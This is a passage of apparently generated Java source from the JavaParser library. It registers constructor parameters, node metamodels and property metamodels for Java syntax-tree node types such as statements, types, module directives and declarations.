variableDeclarationExprMetaModel.getConstructorParameters().add(variableDeclarationExprMetaModel.variablesPropertyMetaModel);
importDeclarationMetaModel.getConstructorParameters().add(importDeclarationMetaModel.namePropertyMetaModel);
importDeclarationMetaModel.getConstructorParameters().add(importDeclarationMetaModel.isStaticPropertyMetaModel);
importDeclarationMetaModel.getConstructorParameters().add(importDeclarationMetaModel.isAsteriskPropertyMetaModel);
assertStmtMetaModel.getConstructorParameters().add(assertStmtMetaModel.checkPropertyMetaModel);
assertStmtMetaModel.getConstructorParameters().add(assertStmtMetaModel.messagePropertyMetaModel);
blockStmtMetaModel.getConstructorParameters().add(blockStmtMetaModel.statementsPropertyMetaModel);
breakStmtMetaModel.getConstructorParameters().add(breakStmtMetaModel.labelPropertyMetaModel);
catchClauseMetaModel.getConstructorParameters().add(catchClauseMetaModel.parameterPropertyMetaModel);
catchClauseMetaModel.getConstructorParameters().add(catchClauseMetaModel.bodyPropertyMetaModel);
continueStmtMetaModel.getConstructorParameters().add(continueStmtMetaModel.labelPropertyMetaModel);
doStmtMetaModel.getConstructorParameters().add(doStmtMetaModel.bodyPropertyMetaModel);
doStmtMetaModel.getConstructorParameters().add(doStmtMetaModel.conditionPropertyMetaModel);
explicitConstructorInvocationStmtMetaModel.getConstructorParameters().add(explicitConstructorInvocationStmtMetaModel.typeArgumentsPropertyMetaModel);
explicitConstructorInvocationStmtMetaModel.getConstructorParameters().add(explicitConstructorInvocationStmtMetaModel.isThisPropertyMetaModel);
explicitConstructorInvocationStmtMetaModel.getConstructorParameters().add(explicitConstructorInvocationStmtMetaModel.expressionPropertyMetaModel);
explicitConstructorInvocationStmtMetaModel.getConstructorParameters().add(explicitConstructorInvocationStmtMetaModel.argumentsPropertyMetaModel);
expressionStmtMetaModel.getConstructorParameters().add(expressionStmtMetaModel.expressionPropertyMetaModel);
foreachStmtMetaModel.getConstructorParameters().add(foreachStmtMetaModel.variablePropertyMetaModel);
foreachStmtMetaModel.getConstructorParameters().add(foreachStmtMetaModel.iterablePropertyMetaModel);
foreachStmtMetaModel.getConstructorParameters().add(foreachStmtMetaModel.bodyPropertyMetaModel);
forStmtMetaModel.getConstructorParameters().add(forStmtMetaModel.initializationPropertyMetaModel);
forStmtMetaModel.getConstructorParameters().add(forStmtMetaModel.comparePropertyMetaModel);
forStmtMetaModel.getConstructorParameters().add(forStmtMetaModel.updatePropertyMetaModel);
forStmtMetaModel.getConstructorParameters().add(forStmtMetaModel.bodyPropertyMetaModel);
ifStmtMetaModel.getConstructorParameters().add(ifStmtMetaModel.conditionPropertyMetaModel);
ifStmtMetaModel.getConstructorParameters().add(ifStmtMetaModel.thenStmtPropertyMetaModel);
ifStmtMetaModel.getConstructorParameters().add(ifStmtMetaModel.elseStmtPropertyMetaModel);
labeledStmtMetaModel.getConstructorParameters().add(labeledStmtMetaModel.labelPropertyMetaModel);
labeledStmtMetaModel.getConstructorParameters().add(labeledStmtMetaModel.statementPropertyMetaModel);
returnStmtMetaModel.getConstructorParameters().add(returnStmtMetaModel.expressionPropertyMetaModel);
switchEntryStmtMetaModel.getConstructorParameters().add(switchEntryStmtMetaModel.labelPropertyMetaModel);
switchEntryStmtMetaModel.getConstructorParameters().add(switchEntryStmtMetaModel.statementsPropertyMetaModel);
switchStmtMetaModel.getConstructorParameters().add(switchStmtMetaModel.selectorPropertyMetaModel);
switchStmtMetaModel.getConstructorParameters().add(switchStmtMetaModel.entriesPropertyMetaModel);
synchronizedStmtMetaModel.getConstructorParameters().add(synchronizedStmtMetaModel.expressionPropertyMetaModel);
synchronizedStmtMetaModel.getConstructorParameters().add(synchronizedStmtMetaModel.bodyPropertyMetaModel);
throwStmtMetaModel.getConstructorParameters().add(throwStmtMetaModel.expressionPropertyMetaModel);
tryStmtMetaModel.getConstructorParameters().add(tryStmtMetaModel.resourcesPropertyMetaModel);
tryStmtMetaModel.getConstructorParameters().add(tryStmtMetaModel.tryBlockPropertyMetaModel);
tryStmtMetaModel.getConstructorParameters().add(tryStmtMetaModel.catchClausesPropertyMetaModel);
tryStmtMetaModel.getConstructorParameters().add(tryStmtMetaModel.finallyBlockPropertyMetaModel);
localClassDeclarationStmtMetaModel.getConstructorParameters().add(localClassDeclarationStmtMetaModel.classDeclarationPropertyMetaModel);
whileStmtMetaModel.getConstructorParameters().add(whileStmtMetaModel.conditionPropertyMetaModel);
whileStmtMetaModel.getConstructorParameters().add(whileStmtMetaModel.bodyPropertyMetaModel);
arrayTypeMetaModel.getConstructorParameters().add(arrayTypeMetaModel.componentTypePropertyMetaModel);
arrayTypeMetaModel.getConstructorParameters().add(typeMetaModel.annotationsPropertyMetaModel);
classOrInterfaceTypeMetaModel.getConstructorParameters().add(classOrInterfaceTypeMetaModel.scopePropertyMetaModel);
classOrInterfaceTypeMetaModel.getConstructorParameters().add(classOrInterfaceTypeMetaModel.namePropertyMetaModel);
classOrInterfaceTypeMetaModel.getConstructorParameters().add(classOrInterfaceTypeMetaModel.typeArgumentsPropertyMetaModel);
classOrInterfaceTypeMetaModel.getConstructorParameters().add(typeMetaModel.annotationsPropertyMetaModel);
intersectionTypeMetaModel.getConstructorParameters().add(intersectionTypeMetaModel.elementsPropertyMetaModel);
primitiveTypeMetaModel.getConstructorParameters().add(primitiveTypeMetaModel.typePropertyMetaModel);
typeParameterMetaModel.getConstructorParameters().add(typeParameterMetaModel.namePropertyMetaModel);
typeParameterMetaModel.getConstructorParameters().add(typeParameterMetaModel.typeBoundPropertyMetaModel);
typeParameterMetaModel.getConstructorParameters().add(typeMetaModel.annotationsPropertyMetaModel);
unionTypeMetaModel.getConstructorParameters().add(unionTypeMetaModel.elementsPropertyMetaModel);
wildcardTypeMetaModel.getConstructorParameters().add(wildcardTypeMetaModel.extendedTypePropertyMetaModel);
wildcardTypeMetaModel.getConstructorParameters().add(wildcardTypeMetaModel.superTypePropertyMetaModel);
moduleRequiresStmtMetaModel.getConstructorParameters().add(moduleRequiresStmtMetaModel.modifiersPropertyMetaModel);
moduleRequiresStmtMetaModel.getConstructorParameters().add(moduleRequiresStmtMetaModel.namePropertyMetaModel);
moduleExportsStmtMetaModel.getConstructorParameters().add(moduleExportsStmtMetaModel.namePropertyMetaModel);
moduleExportsStmtMetaModel.getConstructorParameters().add(moduleExportsStmtMetaModel.moduleNamesPropertyMetaModel);
moduleProvidesStmtMetaModel.getConstructorParameters().add(moduleProvidesStmtMetaModel.typePropertyMetaModel);
moduleProvidesStmtMetaModel.getConstructorParameters().add(moduleProvidesStmtMetaModel.withTypesPropertyMetaModel);
moduleUsesStmtMetaModel.getConstructorParameters().add(moduleUsesStmtMetaModel.typePropertyMetaModel);
moduleOpensStmtMetaModel.getConstructorParameters().add(moduleOpensStmtMetaModel.namePropertyMetaModel);
moduleOpensStmtMetaModel.getConstructorParameters().add(moduleOpensStmtMetaModel.moduleNamesPropertyMetaModel);
}
public static List<BaseNodeMetaModel> getNodeMetaModels() {
return nodeMetaModels;
}
private static void initializeNodeMetaModels() {
nodeMetaModels.add(annotationDeclarationMetaModel);
nodeMetaModels.add(annotationExprMetaModel);
nodeMetaModels.add(annotationMemberDeclarationMetaModel);
nodeMetaModels.add(arrayAccessExprMetaModel);
nodeMetaModels.add(arrayCreationExprMetaModel);
nodeMetaModels.add(arrayCreationLevelMetaModel);
nodeMetaModels.add(arrayInitializerExprMetaModel);
nodeMetaModels.add(arrayTypeMetaModel);
nodeMetaModels.add(assertStmtMetaModel);
nodeMetaModels.add(assignExprMetaModel);
nodeMetaModels.add(binaryExprMetaModel);
nodeMetaModels.add(blockCommentMetaModel);
nodeMetaModels.add(blockStmtMetaModel);
nodeMetaModels.add(bodyDeclarationMetaModel);
nodeMetaModels.add(booleanLiteralExprMetaModel);
nodeMetaModels.add(breakStmtMetaModel);
nodeMetaModels.add(callableDeclarationMetaModel);
nodeMetaModels.add(castExprMetaModel);
nodeMetaModels.add(catchClauseMetaModel);
nodeMetaModels.add(charLiteralExprMetaModel);
nodeMetaModels.add(classExprMetaModel);
nodeMetaModels.add(classOrInterfaceDeclarationMetaModel);
nodeMetaModels.add(classOrInterfaceTypeMetaModel);
nodeMetaModels.add(commentMetaModel);
nodeMetaModels.add(compilationUnitMetaModel);
nodeMetaModels.add(conditionalExprMetaModel);
nodeMetaModels.add(constructorDeclarationMetaModel);
nodeMetaModels.add(continueStmtMetaModel);
nodeMetaModels.add(doStmtMetaModel);
nodeMetaModels.add(doubleLiteralExprMetaModel);
nodeMetaModels.add(emptyMemberDeclarationMetaModel);
nodeMetaModels.add(emptyStmtMetaModel);
nodeMetaModels.add(enclosedExprMetaModel);
nodeMetaModels.add(enumConstantDeclarationMetaModel);
nodeMetaModels.add(enumDeclarationMetaModel);
nodeMetaModels.add(explicitConstructorInvocationStmtMetaModel);
nodeMetaModels.add(expressionMetaModel);
nodeMetaModels.add(expressionStmtMetaModel);
nodeMetaModels.add(fieldAccessExprMetaModel);
nodeMetaModels.add(fieldDeclarationMetaModel);
nodeMetaModels.add(forStmtMetaModel);
nodeMetaModels.add(foreachStmtMetaModel);
nodeMetaModels.add(ifStmtMetaModel);
nodeMetaModels.add(importDeclarationMetaModel);
nodeMetaModels.add(initializerDeclarationMetaModel);
nodeMetaModels.add(instanceOfExprMetaModel);
nodeMetaModels.add(integerLiteralExprMetaModel);
nodeMetaModels.add(intersectionTypeMetaModel);
nodeMetaModels.add(javadocCommentMetaModel);
nodeMetaModels.add(labeledStmtMetaModel);
nodeMetaModels.add(lambdaExprMetaModel);
nodeMetaModels.add(lineCommentMetaModel);
nodeMetaModels.add(literalExprMetaModel);
nodeMetaModels.add(literalStringValueExprMetaModel);
nodeMetaModels.add(localClassDeclarationStmtMetaModel);
nodeMetaModels.add(longLiteralExprMetaModel);
nodeMetaModels.add(markerAnnotationExprMetaModel);
nodeMetaModels.add(memberValuePairMetaModel);
nodeMetaModels.add(methodCallExprMetaModel);
nodeMetaModels.add(methodDeclarationMetaModel);
nodeMetaModels.add(methodReferenceExprMetaModel);
nodeMetaModels.add(moduleDeclarationMetaModel);
nodeMetaModels.add(moduleExportsStmtMetaModel);
nodeMetaModels.add(moduleOpensStmtMetaModel);
nodeMetaModels.add(moduleProvidesStmtMetaModel);
nodeMetaModels.add(moduleRequiresStmtMetaModel);
nodeMetaModels.add(moduleStmtMetaModel);
nodeMetaModels.add(moduleUsesStmtMetaModel);
nodeMetaModels.add(nameExprMetaModel);
nodeMetaModels.add(nameMetaModel);
nodeMetaModels.add(nodeMetaModel);
nodeMetaModels.add(normalAnnotationExprMetaModel);
nodeMetaModels.add(nullLiteralExprMetaModel);
nodeMetaModels.add(objectCreationExprMetaModel);
nodeMetaModels.add(packageDeclarationMetaModel);
nodeMetaModels.add(parameterMetaModel);
nodeMetaModels.add(primitiveTypeMetaModel);
nodeMetaModels.add(referenceTypeMetaModel);
nodeMetaModels.add(returnStmtMetaModel);
nodeMetaModels.add(simpleNameMetaModel);
nodeMetaModels.add(singleMemberAnnotationExprMetaModel);
nodeMetaModels.add(statementMetaModel);
nodeMetaModels.add(stringLiteralExprMetaModel);
nodeMetaModels.add(superExprMetaModel);
nodeMetaModels.add(switchEntryStmtMetaModel);
nodeMetaModels.add(switchStmtMetaModel);
nodeMetaModels.add(synchronizedStmtMetaModel);
nodeMetaModels.add(thisExprMetaModel);
nodeMetaModels.add(throwStmtMetaModel);
nodeMetaModels.add(tryStmtMetaModel);
nodeMetaModels.add(typeDeclarationMetaModel);
nodeMetaModels.add(typeExprMetaModel);
nodeMetaModels.add(typeMetaModel);
nodeMetaModels.add(typeParameterMetaModel);
nodeMetaModels.add(unaryExprMetaModel);
nodeMetaModels.add(unionTypeMetaModel);
nodeMetaModels.add(unknownTypeMetaModel);
nodeMetaModels.add(variableDeclarationExprMetaModel);
nodeMetaModels.add(variableDeclaratorMetaModel);
nodeMetaModels.add(voidTypeMetaModel);
nodeMetaModels.add(whileStmtMetaModel);
nodeMetaModels.add(wildcardTypeMetaModel);
}
private static void initializePropertyMetaModels() {
nodeMetaModel.commentPropertyMetaModel = new PropertyMetaModel(nodeMetaModel, "comment", com.github.javaparser.ast.comments.Comment.class, Optional.of(commentMetaModel), true, false, false, false, false);
nodeMetaModel.getDeclaredPropertyMetaModels().add(nodeMetaModel.commentPropertyMetaModel);
bodyDeclarationMetaModel.annotationsPropertyMetaModel = new PropertyMetaModel(bodyDeclarationMetaModel, "annotations", com.github.javaparser.ast.expr.AnnotationExpr.class, Optional.of(annotationExprMetaModel), false, false, true, false, false);
bodyDeclarationMetaModel.getDeclaredPropertyMetaModels().add(bodyDeclarationMetaModel.annotationsPropertyMetaModel);
callableDeclarationMetaModel.modifiersPropertyMetaModel = new PropertyMetaModel(callableDeclarationMetaModel, "modifiers", com.github.javaparser.ast.Modifier.class, Optional.empty(), false, false, false, true, false);
callableDeclarationMetaModel.getDeclaredPropertyMetaModels().add(callableDeclarationMetaModel.modifiersPropertyMetaModel);
callableDeclarationMetaModel.namePropertyMetaModel = new PropertyMetaModel(callableDeclarationMetaModel, "name", com.github.javaparser.ast.expr.SimpleName.class, Optional.of(simpleNameMetaModel), false, false, false, false, false);
callableDeclarationMetaModel.getDeclaredPropertyMetaModels().add(callableDeclarationMetaModel.namePropertyMetaModel);
callableDeclarationMetaModel.parametersPropertyMetaModel = new PropertyMetaModel(callableDeclarationMetaModel, "parameters", com.github.javaparser.ast.body.Parameter.class, Optional.of(parameterMetaModel), false, false, true, false, false);
callableDeclarationMetaModel.getDeclaredPropertyMetaModels().add(callableDeclarationMetaModel.parametersPropertyMetaModel);
callableDeclarationMetaModel.thrownExceptionsPropertyMetaModel = new PropertyMetaModel(callableDeclarationMetaModel, "thrownExceptions", com.github.javaparser.ast.type.ReferenceType.class, Optional.of(referenceTypeMetaModel), false, false, true, false, true);
callableDeclarationMetaModel.getDeclaredPropertyMetaModels().add(callableDeclarationMetaModel.thrownExceptionsPropertyMetaModel);
callableDeclarationMetaModel.typeParametersPropertyMetaModel = new PropertyMetaModel(callableDeclarationMetaModel, "typeParameters", com.github.javaparser.ast.type.TypeParameter.class, Optional.of(typeParameterMetaModel), false, false, true, false, false);
callableDeclarationMetaModel.getDeclaredPropertyMetaModels().add(callableDeclarationMetaModel.typeParametersPropertyMetaModel);
typeMetaModel.annotationsPropertyMetaModel = new PropertyMetaModel(typeMetaModel, "annotations", com.github.javaparser.ast.expr.AnnotationExpr.class, Optional.of(annotationExprMetaModel), false, false, true, false, false);
typeMetaModel.getDeclaredPropertyMetaModels().add(typeMetaModel.annotationsPropertyMetaModel);
annotationExprMetaModel.namePropertyMetaModel = new PropertyMetaModel(annotationExprMetaModel, "name", com.github.javaparser.ast.expr.Name.class, Optional.of(nameMetaModel), false, false, false, false, false);
annotationExprMetaModel.getDeclaredPropertyMetaModels().add(annotationExprMetaModel.namePropertyMetaModel);
typeDeclarationMetaModel.membersPropertyMetaModel = new PropertyMetaModel(typeDeclarationMetaModel, "members", com.github.javaparser.ast.body.BodyDeclaration.class, Optional.of(bodyDeclarationMetaModel), false, false, true, false, true);
typeDeclarationMetaModel.getDeclaredPropertyMetaModels().add(typeDeclarationMetaModel.membersPropertyMetaModel);
typeDeclarationMetaModel.modifiersPropertyMetaModel = new PropertyMetaModel(typeDeclarationMetaModel, "modifiers", com.github.javaparser.ast.Modifier.class, Optional.empty(), false, false, false, true, false);
typeDeclarationMetaModel.getDeclaredPropertyMetaModels().add(typeDeclarationMetaModel.modifiersPropertyMetaModel);
typeDeclarationMetaModel.namePropertyMetaModel = new PropertyMetaModel(typeDeclarationMetaModel, "name", com.github.javaparser.ast.expr.SimpleName.class, Optional.of(simpleNameMetaModel), false, false, false, false, false);
typeDeclarationMetaModel.getDeclaredPropertyMetaModels().add(typeDeclarationMetaModel.namePropertyMetaModel);
literalStringValueExprMetaModel.valuePropertyMetaModel = new PropertyMetaModel(literalStringValueExprMetaModel, "value", java.lang.String.class, Optional.empty(), false, false, false, false, false);
literalStringValueExprMetaModel.getDeclaredPropertyMetaModels().add(literalStringValueExprMetaModel.valuePropertyMetaModel);
moduleDeclarationMetaModel.annotationsPropertyMetaModel = new PropertyMetaModel(moduleDeclarationMetaModel, "annotations", com.github.javaparser.ast.expr.AnnotationExpr.class, Optional.of(annotationExprMetaModel), false, false, true, false, false);
moduleDeclarationMetaModel.getDeclaredPropertyMetaModels().add(moduleDeclarationMetaModel.annotationsPropertyMetaModel);
moduleDeclarationMetaModel.isOpenPropertyMetaModel = new PropertyMetaModel(moduleDeclarationMetaModel, "isOpen", boolean.class, Optional.empty(), false, false, false, false, false);
moduleDeclarationMetaModel.getDeclaredPropertyMetaModels().add(moduleDeclarationMetaModel.isOpenPropertyMetaModel);
moduleDeclarationMetaModel.moduleStmtsPropertyMetaModel = new PropertyMetaModel(moduleDeclarationMetaModel, "moduleStmts", com.github.javaparser.ast.modules.ModuleStmt.class, Optional.of(moduleStmtMetaModel), false, false, true, false, false);
moduleDeclarationMetaModel.getDeclaredPropertyMetaModels().add(moduleDeclarationMetaModel.moduleStmtsPropertyMetaModel);
moduleDeclarationMetaModel.namePropertyMetaModel = new PropertyMetaModel(moduleDeclarationMetaModel, "name", com.github.javaparser.ast.expr.Name.class, Optional.of(nameMetaModel), false, false, false, false, false);
moduleDeclarationMetaModel.getDeclaredPropertyMetaModels().add(moduleDeclarationMetaModel.namePropertyMetaModel);
arrayCreationLevelMetaModel.annotationsPropertyMetaModel = new PropertyMetaModel(arrayCreationLevelMetaModel, "annotations", com.github.javaparser.ast.expr.AnnotationExpr.class, Optional.of(annotationExprMetaModel), false, false, true, false, false);
arrayCreationLevelMetaModel.getDeclaredPropertyMetaModels().add(arrayCreationLevelMetaModel.annotationsPropertyMetaModel);
arrayCreationLevelMetaModel.dimensionPropertyMetaModel = new PropertyMetaModel(arrayCreationLevelMetaModel, "dimension", com.github.javaparser.ast.expr.Expression.class, Optional.of(expressionMetaModel), true, false, false, false, false);
arrayCreationLevelMetaModel.getDeclaredPropertyMetaModels().add(arrayCreationLevelMetaModel.dimensionPropertyMetaModel);
compilationUnitMetaModel.importsPropertyMetaModel = new PropertyMetaModel(compilationUnitMetaModel, "imports", com.github.javaparser.ast.ImportDeclaration.class, Optional.of(importDeclarationMetaModel), false, false, true, false, false);
compilationUnitMetaModel.getDeclaredPropertyMetaModels().add(compilationUnitMetaModel.importsPropertyMetaModel);
compilationUnitMetaModel.modulePropertyMetaModel = new PropertyMetaModel(compilationUnitMetaModel, "module", com.github.javaparser.ast.modules.ModuleDeclaration.class, Optional.of(moduleDeclarationMetaModel), true, false, false, false, false);
compilationUnitMetaModel.getDeclaredPropertyMetaModels().add(compilationUnitMetaModel.modulePropertyMetaModel);
compilationUnitMetaModel.packageDeclarationPropertyMetaModel = new PropertyMetaModel(compilationUnitMetaModel, "packageDeclaration", com.github.javaparser.ast.PackageDeclaration.class, Optional.of(packageDeclarationMetaModel), true, false, false, false, false);
compilationUnitMetaModel.getDeclaredPropertyMetaModels().add(compilationUnitMetaModel.packageDeclarationPropertyMetaModel);
compilationUnitMetaModel.typesPropertyMetaModel = new PropertyMetaModel(compilationUnitMetaModel, "types", com.github.javaparser.ast.body.TypeDeclaration.class, Optional.of(typeDeclarationMetaModel), false, false, true, false, true);
compilationUnitMetaModel.getDeclaredPropertyMetaModels().add(compilationUnitMetaModel.typesPropertyMetaModel);
packageDeclarationMetaModel.annotationsPropertyMetaModel = new PropertyMetaModel(packageDeclarationMetaModel, "annotations", com.github.javaparser.ast.expr.AnnotationExpr.class, Optional.of(annotationExprMetaModel), false, false, true, false, false);
packageDeclarationMetaModel.getDeclaredPropertyMetaModels().add(packageDeclarationMetaModel.annotationsPropertyMetaModel);
packageDeclarationMetaModel.namePropertyMetaModel = new PropertyMetaModel(packageDeclarationMetaModel, "name", com.github.javaparser.ast.expr.Name.class, Optional.of(nameMetaModel), false, false, false, false, false);
packageDeclarationMetaModel.getDeclaredPropertyMetaModels().add(packageDeclarationMetaModel.namePropertyMetaModel);
annotationMemberDeclarationMetaModel.defaultValuePropertyMetaModel = new PropertyMetaModel(annotationMemberDeclarationMetaModel, "defaultValue", com.github.javaparser.ast.expr.Expression.class, Optional.of(expressionMetaModel), true, false, false, false, false);
annotationMemberDeclarationMetaModel.getDeclaredPropertyMetaModels().add(annotationMemberDeclarationMetaModel.defaultValuePropertyMetaModel);
annotationMemberDeclarationMetaModel.modifiersPropertyMetaModel = new PropertyMetaModel(annotationMemberDeclarationMetaModel, "modifiers", com.github.javaparser.ast.Modifier.class, Optional.empty(), false, false, false, true, false);
annotationMemberDeclarationMetaModel.getDeclaredPropertyMetaModels().add(annotationMemberDeclarationMetaModel.modifiersPropertyMetaModel);
annotationMemberDeclarationMetaModel.namePropertyMetaModel = new PropertyMetaModel(annotationMemberDeclarationMetaModel, "name", com.github.javaparser.ast.expr.SimpleName.class, Optional.of(simpleNameMetaModel), false, false, false, false, false);
annotationMemberDeclarationMetaModel.getDeclaredPropertyMetaModels().add(annotationMemberDeclarationMetaModel.namePropertyMetaModel);
annotationMemberDeclarationMetaModel.typePropertyMetaModel = new PropertyMetaModel(annotationMemberDeclarationMetaModel, "type", com.github.javaparser.ast.type.Type.class, Optional.of(typeMetaModel), false, false, false, false, false);
annotationMemberDeclarationMetaModel.getDeclaredPropertyMetaModels().add(annotationMemberDeclarationMetaModel.typePropertyMetaModel);
classOrInterfaceDeclarationMetaModel.extendedTypesPropertyMetaModel = new PropertyMetaModel(classOrInterfaceDeclarationMetaModel, "extendedTypes", com.github.javaparser.ast.type.ClassOrInterfaceType.class, Optional.of(classOrInterfaceTypeMetaModel), false, false, true, false, false);
classOrInterfaceDeclarationMetaModel.getDeclaredPropertyMetaModels().add(classOrInterfaceDeclarationMetaModel.extendedTypesPropertyMetaModel);
classOrInterfaceDeclarationMetaModel.implementedTypesPropertyMetaModel = new PropertyMetaModel(classOrInterfaceDeclarationMetaModel, "implementedTypes", com.github.javaparser.ast.type.ClassOrInterfaceType.class, Optional.of(classOrInterfaceTypeMetaModel), false, false, true, false, false);
classOrInterfaceDeclarationMetaModel.getDeclaredPropertyMetaModels().add(classOrInterfaceDeclarationMetaModel.implementedTypesPropertyMetaModel);
classOrInterfaceDeclarationMetaModel.isInterfacePropertyMetaModel = new PropertyMetaModel(classOrInterfaceDeclarationMetaModel, "isInterface", boolean.class, Optional.empty(), false, false, false, false, false);
classOrInterfaceDeclarationMetaModel.getDeclaredPropertyMetaModels().add(classOrInterfaceDeclarationMetaModel.isInterfacePropertyMetaModel);
classOrInterfaceDeclarationMetaModel.typeParametersPropertyMetaModel = new PropertyMetaModel(classOrInterfaceDeclarationMetaModel, "typeParameters", com.github.javaparser.ast.type.TypeParameter.class, Optional.of(typeParameterMetaModel), false, false, true, false, false);
classOrInterfaceDeclarationMetaModel.getDeclaredPropertyMetaModels().add(classOrInterfaceDeclarationMetaModel.typeParametersPropertyMetaModel);
constructorDeclarationMetaModel.bodyPropertyMetaModel = new PropertyMetaModel(constructorDeclarationMetaModel, "body", com.github.javaparser.ast.stmt.BlockStmt.class, Optional.of(blockStmtMetaModel), false, false, false, false, false);
constructorDeclarationMetaModel.getDeclaredPropertyMetaModels().add(constructorDeclarationMetaModel.bodyPropertyMetaModel);
enumConstantDeclarationMetaModel.argumentsPropertyMetaModel = new PropertyMetaModel(enumConstantDeclarationMetaModel, "arguments", com.github.javaparser.ast.expr.Expression.class, Optional.of(expressionMetaModel), false, false, true, false, false);
enumConstantDeclarationMetaModel.getDeclaredPropertyMetaModels().add(enumConstantDeclarationMetaModel.argumentsPropertyMetaModel);
enumConstantDeclarationMetaModel.classBodyPropertyMetaModel = new PropertyMetaModel(enumConstantDeclarationMetaModel, "classBody", com.github.javaparser.ast.body.BodyDeclaration.class, Optional.of(bodyDeclarationMetaModel), false, false, true, false, true);
enumConstantDeclarationMetaModel.getDeclaredPropertyMetaModels().add(enumConstantDeclarationMetaModel.classBodyPropertyMetaModel);
enumConstantDeclarationMetaModel.namePropertyMetaModel = new PropertyMetaModel(enumConstantDeclarationMetaModel, "name", com.github.javaparser.ast.expr.SimpleName.class, Optional.of(simpleNameMetaModel), false, false, false, false, false);
enumConstantDeclarationMetaModel.getDeclaredPropertyMetaModels().add(enumConstantDeclarationMetaModel.namePropertyMetaModel);
enumDeclarationMetaModel.entriesPropertyMetaModel = new PropertyMetaModel(enumDeclarationMetaModel, "entries", com.github.javaparser.ast.body.EnumConstantDeclaration.class, Optional.of(enumConstantDeclarationMetaModel), false, false, true, false, false);
enumDeclarationMetaModel.getDeclaredPropertyMetaModels().add(enumDeclarationMetaModel.entriesPropertyMetaModel);
enumDeclarationMetaModel.implementedTypesPropertyMetaModel = new PropertyMetaModel(enumDeclarationMetaModel, "implementedTypes", com.github.javaparser.ast.type.ClassOrInterfaceType.class, Optional.of(classOrInterfaceTypeMetaModel), false, false, true, false, false);
enumDeclarationMetaModel.getDeclaredPropertyMetaModels().add(enumDeclarationMetaModel.implementedTypesPropertyMetaModel);
fieldDeclarationMetaModel.modifiersPropertyMetaModel = new PropertyMetaModel(fieldDeclarationMetaModel, "modifiers", com.github.javaparser.ast.Modifier.class, Optional.empty(), false, false, false, true, false);
fieldDeclarationMetaModel.getDeclaredPropertyMetaModels().add(fieldDeclarationMetaModel.modifiersPropertyMetaModel);
fieldDeclarationMetaModel.variablesPropertyMetaModel = new PropertyMetaModel(fieldDeclarationMetaModel, "variables", com.github.javaparser.ast.body.VariableDeclarator.class, Optional.of(variableDeclaratorMetaModel), false, true, true, false, false);
fieldDeclarationMetaModel.getDeclaredPropertyMetaModels().add(fieldDeclarationMetaModel.variablesPropertyMetaModel);
fieldDeclarationMetaModel.maximumCommonTypePropertyMetaModel = new PropertyMetaModel(fieldDeclarationMetaModel, "maximumCommonType", com.github.javaparser.ast.type.Type.class, Optional.of(typeMetaModel), false, false, false, false, false);
fieldDeclarationMetaModel.getDerivedPropertyMetaModels().add(fieldDeclarationMetaModel.maximumCommonTypePropertyMetaModel);
initializerDeclarationMetaModel.bodyPropertyMetaModel = new PropertyMetaModel(initializerDeclarationMetaModel, "body", com.github.javaparser.ast.stmt.BlockStmt.class, Optional.of(blockStmtMetaModel), false, false, false, false, false);
initializerDeclarationMetaModel.getDeclaredPropertyMetaModels().add(initializerDeclarationMetaModel.bodyPropertyMetaModel);
initializerDeclarationMetaModel.isStaticPropertyMetaModel = new PropertyMetaModel(initializerDeclarationMetaModel, "isStatic", boolean.class, Optional.empty(), false, false, false, false, false);
initializerDeclarationMetaModel.getDeclaredPropertyMetaModels().add(initializerDeclarationMetaModel.isStaticPropertyMetaModel);
methodDeclarationMetaModel.bodyPropertyMetaModel = new PropertyMetaModel(methodDeclarationMetaModel, "body", com.github.javaparser.ast.stmt.BlockStmt.class, Optional.of(blockStmtMetaModel), true, false, false, false, false);
methodDeclarationMetaModel.getDeclaredPropertyMetaModels().add(methodDeclarationMetaModel.bodyPropertyMetaModel);
methodDeclarationMetaModel.typePropertyMetaModel = new PropertyMetaModel(methodDeclarationMetaModel, "type", com.github.javaparser.ast.type.Type.class, Optional.of(typeMetaModel), false, false, false, false, false);
methodDeclarationMetaModel.getDeclaredPropertyMetaModels().add(methodDeclarationMetaModel.typePropertyMetaModel);
parameterMetaModel.annotationsPropertyMetaModel = new PropertyMetaModel(parameterMetaModel, "annotations", com.github.javaparser.ast.expr.AnnotationExpr.class, Optional.of(annotationExprMetaModel), false, false, true, false, false);
parameterMetaModel.getDeclaredPropertyMetaModels().add(parameterMetaModel.annotationsPropertyMetaModel);
parameterMetaModel.isVarArgsPropertyMetaModel = new PropertyMetaModel(parameterMetaModel, "isVarArgs", boolean.class, Optional.empty(), false, false, false, false, false);
parameterMetaModel.getDeclaredPropertyMetaModels().add(parameterMetaModel.isVarArgsPropertyMetaModel);
parameterMetaModel.modifiersPropertyMetaModel = new PropertyMetaModel(parameterMetaModel, "modifiers", com.github.javaparser.ast.Modifier.class, Optional.empty(), false, false, false, true, false);
parameterMetaModel.getDeclaredPropertyMetaModels().add(parameterMetaModel.modifiersPropertyMetaModel);
parameterMetaModel.namePropertyMetaModel = new PropertyMetaModel(parameterMetaModel, "name", com.github.javaparser.ast.expr.SimpleName.class, Optional.of(simpleNameMetaModel), false, false, false, false, false);
parameterMetaModel.getDeclaredPropertyMetaModels().add(parameterMetaModel.namePropertyMetaModel);
parameterMetaModel.typePropertyMetaModel = new PropertyMetaModel(parameterMetaModel, "type", com.github.javaparser.ast.type.Type.class, Optional.of(typeMetaModel), false, false, false, false, false);
parameterMetaModel.getDeclaredPropertyMetaModels().add(parameterMetaModel.typePropertyMetaModel);
parameterMetaModel.varArgsAnnotationsPropertyMetaModel = new PropertyMetaModel(parameterMetaModel, "varArgsAnnotations", com.github.javaparser.ast.expr.AnnotationExpr.class, Optional.of(annotationExprMetaModel), false, false, true, false, false);
parameterMetaModel.getDeclaredPropertyMetaModels().add(parameterMetaModel.varArgsAnnotationsPropertyMetaModel);
variableDeclaratorMetaModel.initializerPropertyMetaModel = new PropertyMetaModel(variableDeclaratorMetaModel, "initializer", com.github.javaparser.ast.expr.Expression.class, Optional.of(expressionMetaModel), true, true, false, false, false);
variableDeclaratorMetaModel.getDeclaredPropertyMetaModels().add(variableDeclaratorMetaModel.initializerPropertyMetaModel);
variableDeclaratorMetaModel.namePropertyMetaModel = new PropertyMetaModel(variableDeclaratorMetaModel, "name", com.github.javaparser.ast.expr.SimpleName.class, Optional.of(simpleNameMetaModel), false, false, false, false, false);
variableDeclaratorMetaModel.getDeclaredPropertyMetaModels().add(variableDeclaratorMetaModel.namePropertyMetaModel);
